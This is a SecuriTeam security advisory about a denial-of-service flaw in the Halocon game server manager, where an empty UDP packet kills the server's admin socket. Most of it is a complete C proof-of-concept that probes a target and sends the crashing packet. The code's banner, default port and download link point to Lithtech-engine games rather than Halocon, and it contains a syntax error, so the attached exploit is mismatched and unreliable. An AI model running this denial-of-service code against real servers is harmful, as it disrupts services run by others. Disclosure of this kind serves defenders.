[NT] Halocon Malformed UDP DoS

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Halocon Malformed UDP DoS
------------------------------------------------------------------------


SUMMARY

 <http://www.zaboo.net> Halocon is "a remote server manager written by 
jazper". By sending a malformed UDP packet to the Halocon game server it 
possible to cause it to crash.

DETAILS

An empty UDP packet (zero bytes) leads to the automatic termination of the 
Halocon server's socket. So the admin will be no longer able to send 
remote commands to the Halocon application.

Exploit:
Halocon works on port 2305 by default, so remember to specify it when use 
the proof-of-concept.

/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/lithsock.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close closesocket
    #define ONESEC 1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC 1
#endif

#define VER "0.1"
#define BUFFSZ 2048
#define PORT 27888
#define TIMEOUT 3
#define CHECK "\x10\x7f\x33\x01"
#define ZERO "" // 0 bytes, a cool bug

#define SEND(x) if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr 
*)&peer, sizeof(peer)) \
                  < 0) std_err();

int info_proto(u_char *data);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
    struct sockaddr_in peer;
    int sd,
            len;
    u_short port = PORT;
    u_char buff[BUFFSZ];

    setbuf(stdout, NULL);

    fputs("\n"
        "Lithtech engine (new protocol) socket unreacheable "VER"\n"
        " Contract Jack <= 1.1\n"
        " No one lives forever 2 <= 1.3\n"
        " Tron 2.0 <= 1.042\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web: http://aluigi.altervista.org\n";
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port = htons(port);
    peer.sin_family = AF_INET;

    printf("- target %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    fputs("- check if server is online\n", stdout);
    SEND(CHECK);
    if(timeout(sd) < 0) {
        fputs("\nError: socket timeout, no reply received\n\n", stdout);
        exit(1);
    } else {
        len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
        if(len < 0) std_err();
        if(memcmp(buff, CHECK, 3)) {
            if(*buff == '\\') {
                fputs("- received an information reply, seems you have 
specified a wrong port.\n"
                    " Try with a lower one\n", stdout);
            } else {
                fputs("\nError: unknown data received, this is none of the 
vulnerable games\n\n", stdout);
            }
            exit(1);
        }
    }

    fputs("- send a ZERO bytes packet\n", stdout);
    SEND(ZERO);

    fputs("- wait one second\n", stdout);
    sleep(ONESEC);

    fputs("- check if the server is vulnerable:\n", stdout);
    SEND(CHECK);

    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }

    close(sd);

    return(0);
}

int timeout(int sock) {
    struct timeval tout;
    fd_set fd_read;
    int err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}

u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}

#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


ADDITIONAL INFORMATION

The information has been provided by  <mailto:aluigi@autistici.org> Luigi 
Auriemma.
The original article can be found at:  
<http://aluigi.altervista.org/adv/halocon-adv.txt> 
http://aluigi.altervista.org/adv/halocon-adv.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.